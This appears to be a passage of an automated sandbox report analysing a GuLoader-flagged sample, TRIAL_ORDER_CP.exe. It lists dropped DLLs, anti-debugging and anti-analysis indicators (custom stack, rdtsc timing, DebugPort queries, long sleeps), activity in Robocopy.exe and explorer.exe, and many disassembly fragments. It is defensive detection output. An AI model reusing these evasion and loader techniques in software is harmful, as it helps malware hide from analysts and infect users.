        Source: Binary string: wntdll.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: TRIAL_ORDER_CP.exe, TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: robocopy.pdbGCTL source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.270766627678.0000000004C73000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_70681BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70681BFF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_706830C0 push eax; ret 0_2_706830EE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B108CD push ecx; mov dword ptr [esp], ecx3_2_33B108D6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_338063E2 push ebx; iretd 3_2_33806409
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_338002F3 push ds; ret 3_2_338002F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380C225 push ebp; ret 3_2_3380C1F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380BA36 push esi; ret 3_2_3380BA45
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380C1CA push ebp; ret 3_2_3380C1F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_338058D9 push D494064Eh; iretd 3_2_338058DE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33804870 push edi; retf 3_2_33804871
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380FECC push ebp; retf 3_2_3380FECD
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33803DB4 pushad ; ret 3_2_33803E61
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_338074DB push eax; retf 3_2_338074F7
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_047425F8 pushad ; ret 5_2_0474269F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_04744C20 push ebx; iretd 5_2_04744C47
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_047430AE push edi; retf 5_2_047430AF
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_04744117 push D494064Eh; iretd 5_2_0474411C
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_04745D19 push eax; retf 5_2_04745D35
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_047425F2 pushad ; ret 5_2_0474269F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474A274 push esi; ret 5_2_0474A283
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474AA63 push ebp; ret 5_2_0474AA34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474AA08 push ebp; ret 5_2_0474AA34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0473EB31 push ds; ret 5_2_0473EB34
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474E70A push ebp; retf 5_2_0474E70B
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045608CD push ecx; mov dword ptr [esp], ecx6_2_045608D6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_048874DB push eax; retf 6_2_048874F7
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04883DB4 pushad ; ret 6_2_04883E61
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488FECC push ebp; retf 6_2_0488FECD
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_048858D9 push D494064Eh; iretd 6_2_048858DE
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04884870 push edi; retf 6_2_04884871
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488C1CA push ebp; ret 6_2_0488C1F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_048802F3 push ds; ret 6_2_048802F6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 51EB40B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 1DBB40B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D30594
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2FF74
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D6C4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D864
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D004
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D144
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D30594
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D764
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D324
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D364
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D004
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2FF74
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D6C4
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI/Special instruction interceptor: Address: 7FFBD8D2D864
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 rdtsc 3_2_33B51763
        Source: C:\Windows\SysWOW64\Robocopy.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\Robocopy.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exe TID: 6716Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\Robocopy.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\keyboard.inf_loc
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270873238826.0000000003824000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270873405558.0000000003824000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.00000000037F1000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D32F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D2CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Robocopy.exe, 00000006.00000002.272501983227.00000000027A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI call chain: ExitProcess graph end nodegraph_0-2582
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeAPI call chain: ExitProcess graph end nodegraph_0-2807
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B51763 rdtsc 3_2_33B51763
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B534E0 NtCreateMutant,LdrInitializeThunk,3_2_33B534E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_70681BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70681BFF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8C3B0 mov eax, dword ptr fs:[00000030h]3_2_33B8C3B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B193A6 mov eax, dword ptr fs:[00000030h]3_2_33B193A6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B193A6 mov eax, dword ptr fs:[00000030h]3_2_33B193A6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h]3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h]3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3A390 mov eax, dword ptr fs:[00000030h]3_2_33B3A390
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h]3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h]3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h]3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h]3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B11380 mov eax, dword ptr fs:[00000030h]3_2_33B11380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2F380 mov eax, dword ptr fs:[00000030h]3_2_33B2F380
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF38A mov eax, dword ptr fs:[00000030h]3_2_33BCF38A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B433D0 mov eax, dword ptr fs:[00000030h]3_2_33B433D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B443D0 mov ecx, dword ptr fs:[00000030h]3_2_33B443D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B943D5 mov eax, dword ptr fs:[00000030h]3_2_33B943D5
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h]3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h]3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E3C0 mov eax, dword ptr fs:[00000030h]3_2_33B0E3C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C3C7 mov eax, dword ptr fs:[00000030h]3_2_33B0C3C7
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B163CB mov eax, dword ptr fs:[00000030h]3_2_33B163CB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BE3336 mov eax, dword ptr fs:[00000030h]3_2_33BE3336
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h]3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h]3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B48322 mov eax, dword ptr fs:[00000030h]3_2_33B48322
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h]3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h]3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0E328 mov eax, dword ptr fs:[00000030h]3_2_33B0E328
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3332D mov eax, dword ptr fs:[00000030h]3_2_33B3332D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h]3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h]3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2E310 mov eax, dword ptr fs:[00000030h]3_2_33B2E310
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4631F mov eax, dword ptr fs:[00000030h]3_2_33B4631F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B09303 mov eax, dword ptr fs:[00000030h]3_2_33B09303
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B09303 mov eax, dword ptr fs:[00000030h]3_2_33B09303
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h]3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h]3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h]3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9330C mov eax, dword ptr fs:[00000030h]3_2_33B9330C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF30A mov eax, dword ptr fs:[00000030h]3_2_33BCF30A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B90371 mov eax, dword ptr fs:[00000030h]3_2_33B90371
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B90371 mov eax, dword ptr fs:[00000030h]3_2_33B90371
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3237A mov eax, dword ptr fs:[00000030h]3_2_33B3237A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h]3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h]3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h]3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E372 mov eax, dword ptr fs:[00000030h]3_2_33B8E372
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1B360 mov eax, dword ptr fs:[00000030h]3_2_33B1B360
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E363 mov eax, dword ptr fs:[00000030h]3_2_33B4E363
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4A350 mov eax, dword ptr fs:[00000030h]3_2_33B4A350
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h]3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h]3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B08347 mov eax, dword ptr fs:[00000030h]3_2_33B08347
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B0C2B0 mov ecx, dword ptr fs:[00000030h]3_2_33B0C2B0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h]3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h]3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h]3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEB2BC mov eax, dword ptr fs:[00000030h]3_2_33BEB2BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCF2AE mov eax, dword ptr fs:[00000030h]3_2_33BCF2AE
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD92AB mov eax, dword ptr fs:[00000030h]3_2_33BD92AB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B342AF mov eax, dword ptr fs:[00000030h]3_2_33B342AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B342AF mov eax, dword ptr fs:[00000030h]3_2_33B342AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B092AF mov eax, dword ptr fs:[00000030h]3_2_33B092AF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h]3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h]3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B17290 mov eax, dword ptr fs:[00000030h]3_2_33B17290
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8E289 mov eax, dword ptr fs:[00000030h]3_2_33B8E289
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B202F9 mov eax, dword ptr fs:[00000030h]3_2_33B202F9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B072E0 mov eax, dword ptr fs:[00000030h]3_2_33B072E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1A2E0 mov eax, dword ptr fs:[00000030h]3_2_33B1A2E0
